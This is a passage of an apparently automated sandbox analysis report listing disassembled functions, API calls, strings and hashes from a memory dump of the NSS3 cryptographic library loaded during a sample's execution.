Part of subcall function 6C58F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C58F868
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C58F882
Part of subcall function 6C58F820: free.MOZGLUE(04C483FF,?,?), ref: 6C58F889
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C58F8A4
Part of subcall function 6C58F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C58F8AB
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C58F8C9
Part of subcall function 6C58F820: free.MOZGLUE(280F10EC,?,?), ref: 6C58F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C582E62,?,?,?,?,?,?,?,00000000,?,?,?,6C554F1C), ref: 6C568EC3
TlsGetValue.KERNEL32(?,?,?,6C582E62,?,?,?,?,?,?,?,00000000,?,?,?,6C554F1C), ref: 6C568EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C582E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C568EF1
PR_Unlock.NSS3 ref: 6C568F20

Strings

b.Xl, xrefs: 6C568E96, 6C568F25

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.Xl
API String ID: 1978757487-3034476881
Opcode ID: 4b6a4fb07cd380b03bba11713b0ef08fc250a7e79e0e3a9b862c8d200fd27d1c
Instruction ID: 2054fd5daa8dce539244ef62a7b746f2818826e1b436b1b823106b97940b97bc
Opcode Fuzzy Hash: 4b6a4fb07cd380b03bba11713b0ef08fc250a7e79e0e3a9b862c8d200fd27d1c
Instruction Fuzzy Hash: 34216B70A09605DBC700AF2AD984199BBF0FF89318F45466EE8989BB51DB30E854CBC2

Function 6C5D3E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6C5D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5D5B56

PR_EnterMonitor.NSS3(?), ref: 6C5D3E45

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

PR_EnterMonitor.NSS3(?), ref: 6C5D3E5C
PR_EnterMonitor.NSS3(?), ref: 6C5D3E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C5D3EA6

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_ExitMonitor.NSS3(?), ref: 6C5D3EC0
PR_ExitMonitor.NSS3(?), ref: 6C5D3ED7
PR_ExitMonitor.NSS3(?), ref: 6C5D3EEE

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: a83c3db462ce0e23adf403a4a32c562746f83897bc2ac537d450934cbb71e4b4
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: 9E116371610701ABDA319E2DFC02AC7B7B2DB41318F410834E65A96A60F636F929CB5A

Function 6C652C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C652CA0
PR_ExitMonitor.NSS3 ref: 6C652CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C652CD1
strdup.MOZGLUE(?), ref: 6C652CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C652D27

Strings

Loaded library %s (static lib), xrefs: 6C652D22

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 1c08177a6977950972f2dfaa3f0e9dbb8f97993b2688f29346b8edc19573f06c
Instruction ID: 05c849ecbe711fafc6f59819ec417242068f2e54a0c6e5735f7af2146dd4bf34
Opcode Fuzzy Hash: 1c08177a6977950972f2dfaa3f0e9dbb8f97993b2688f29346b8edc19573f06c
Instruction Fuzzy Hash: 0211E6B1701210DFEB008F56E884A6A77B5AB4635DFA4812DD809C7B52E731E818CBA9

Function 6C54BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C54BDCA

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C54BDDB

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C54BDEC

Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C54BE03

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C54BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C54BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C54BE3B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 0c24a9430e00c40000e7b36a7377660078e7a27cd15177bf9d2bb3a1940b707f
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: 1E012B79A40601E7F61032A77C01F9F3A884FD138DF144130FF059AB82FB50E92982B6

Function 6C5A0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B
TlsGetValue.KERNEL32(00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1044
free.MOZGLUE(00000000,?,00000800,6C53EF74,00000000), ref: 6C5A1064

Strings

security, xrefs: 6C5A1025

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 3b3a7620978c2a6d8c6c9b791d4c9984579027b6d0b9d7184e548e2693e3b813
Instruction ID: 82a06a104efd882cfd524baad5deb6e2a29bab123650fa53572931b088193a2f
Opcode Fuzzy Hash: 3b3a7620978c2a6d8c6c9b791d4c9984579027b6d0b9d7184e548e2693e3b813
Instruction Fuzzy Hash: 71014830A40250DBE720AFBF9C09A5F7A68BF42759F010516E808D7A51EB70C506DBD9

Function 6C5D1C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5D1C74

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C5D1C92
free.MOZGLUE(?), ref: 6C5D1C99
DeleteCriticalSection.KERNEL32(?), ref: 6C5D1CCB
free.MOZGLUE(?), ref: 6C5D1CD2

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 05dc1cc1b90544a87c9c7bec2dfe707275abdef12af013394ca8a0665b568cb4
Instruction ID: 4c9a91e75a4dcc403ca22178c5cd3c1560086fb7695e041b625a54d44fe76d4b
Opcode Fuzzy Hash: 05dc1cc1b90544a87c9c7bec2dfe707275abdef12af013394ca8a0665b568cb4
Instruction Fuzzy Hash: 4001C4B1F81211ABDB10EFEBAC4DB4A7B746B0A318F410024E90EA6B40D721F014479D

Function 6C5E2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5E3046

Part of subcall function 6C5CEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5CEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C5B7FFB), ref: 6C5E312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5E3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5E2E8B

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

Part of subcall function 6C5CF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C5B9BFF,?,00000000,00000000), ref: 6C5CF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C5B7FFA), ref: 6C5E2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5E317B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 37de4419a895b8a15ef30b865b93c7582bbb3df04adfb984aebf5bf36930e907
Instruction ID: c6a5c28be7008a4023e32320f433c8911ef5b9d28e27e6a47245f12b0b982dc2
Opcode Fuzzy Hash: 37de4419a895b8a15ef30b865b93c7582bbb3df04adfb984aebf5bf36930e907
Instruction Fuzzy Hash: 21A1DE71A002199FDB24CF54CC81BEAB7B5EF89308F048199ED496B781E771AD85CF92

Function 6C5AED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C5AED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C5AEDCE

Part of subcall function 6C5A0BE0: malloc.MOZGLUE(6C598D2D,?,00000000,?), ref: 6C5A0BF8
Part of subcall function 6C5A0BE0: TlsGetValue.KERNEL32(6C598D2D,?,00000000,?), ref: 6C5A0C15

free.MOZGLUE(00000000,?,?,?,?,6C5AB04F), ref: 6C5AEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5AEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C5AEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C5AEEFB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 7ef3f2c8def28c3b2351feaa95ad8ccf9edc162af4a1ac115a07d9d66673b2f0
Instruction ID: 8d7dfa4ca5cb03ca2410a368da915469cf6e03b8efc4600f168ed1eb81a4edb2
Opcode Fuzzy Hash: 7ef3f2c8def28c3b2351feaa95ad8ccf9edc162af4a1ac115a07d9d66673b2f0
Instruction Fuzzy Hash: 558159B5A002059FEB14CF9ADC80AAF77F5FF89308F144428E8159B751DB70E826CBA1

Function 6C5ACCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C5ADAE2,?), ref: 6C5AC6C2

PR_Now.NSS3 ref: 6C5ACD35

Part of subcall function 6C609DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C650A27), ref: 6C609DC6
Part of subcall function 6C609DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C650A27), ref: 6C609DD1
Part of subcall function 6C609DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C609DED

Part of subcall function 6C596C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C541C6F,00000000,00000004,?,?), ref: 6C596C3F

PR_GetCurrentThread.NSS3 ref: 6C5ACD54

Part of subcall function 6C609BF0: TlsGetValue.KERNEL32(?,?,?,6C650A75), ref: 6C609C07

Part of subcall function 6C597260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C541CCC,00000000,00000000,?,?), ref: 6C59729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5ACD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C5ACE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C5ACE2C

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C5ACE40

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

Part of subcall function 6C5ACEE0: PORT_ArenaMark_Util.NSS3(?,6C5ACD93,?), ref: 6C5ACEEE
Part of subcall function 6C5ACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C5ACD93,?), ref: 6C5ACEFC
Part of subcall function 6C5ACEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C5ACD93,?), ref: 6C5ACF0B
Part of subcall function 6C5ACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C5ACD93,?), ref: 6C5ACF1D

Part of subcall function 6C5ACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C5ACD93,?), ref: 6C5ACF47
Part of subcall function 6C5ACEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C5ACD93,?), ref: 6C5ACF67
Part of subcall function 6C5ACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C5ACD93,?,?,?,?,?,?,?,?,?,?,?,6C5ACD93,?), ref: 6C5ACF78

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 86cfa82f8bc392e2dc8b7feb599b2bc954898f0db7792d9b4bbcc429d908e9d7
Instruction ID: caa353e306f3225560e3380f9347c39903d38c2f4a6ecc073fdcf69aa5339fd9
Opcode Fuzzy Hash: 86cfa82f8bc392e2dc8b7feb599b2bc954898f0db7792d9b4bbcc429d908e9d7
Instruction Fuzzy Hash: CF51A376A002009BEB11DFAADC40B9E77E4EF88348F250524D955AB740EB32FD06CB91

Function 6C4C3850 Relevance: 9.1, APIs: 6, Instructions: 133threadstringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(?,00000025), ref: 6C4C3890
TlsGetValue.KERNEL32 ref: 6C4C38D2
PR_CallOnce.NSS3(6C6A14E4,6C60CC70), ref: 6C4C391C
PR_GetCurrentThread.NSS3 ref: 6C4C3977
memcpy.VCRUNTIME140(?,?,?), ref: 6C4C39A2
PR_GetCurrentThread.NSS3 ref: 6C4C39F2

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CurrentThread$CallOnceValuememcpystrchr
String ID:
API String ID: 892352074-0
Opcode ID: bd49cd4dc51a57223bb71f448662cff406f1dfa9c384c93133bd9a92061d740b
Instruction ID: c82290f0dc5e60850f0551acfaa306bcd13a295542cb65f5bd15096af006093c
Opcode Fuzzy Hash: bd49cd4dc51a57223bb71f448662cff406f1dfa9c384c93133bd9a92061d740b
Instruction Fuzzy Hash: 4D41E475B043118FD710DF3AD984FAA77F4AF8A318F108619E84997761E730E885CB9A

Function 6C5BFFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6C5BFFE5

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_EnterMonitor.NSS3(?), ref: 6C5C0004
PR_EnterMonitor.NSS3(?), ref: 6C5C001B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 389d059f6250de435231a3d4d73e304de4f58567050548666b2bc213d93438d9
Instruction ID: 77f4363b5eb59202ab602dc8d947945df67f0577e05b5a65ca4fe8de81ff0de2
Opcode Fuzzy Hash: 389d059f6250de435231a3d4d73e304de4f58567050548666b2bc213d93438d9
Instruction Fuzzy Hash: F14116F57486808BE7208AA9DC517ABB3A1DBC1708F50093FD44BCAE90E7B9E549C643

Function 6C57EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C57EF38

Part of subcall function 6C569520: PK11_IsLoggedIn.NSS3(00000000,?,6C59379E,?,00000001,?), ref: 6C569542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C57EF53

Part of subcall function 6C584C20: TlsGetValue.KERNEL32 ref: 6C584C4C
Part of subcall function 6C584C20: EnterCriticalSection.KERNEL32(?), ref: 6C584C60
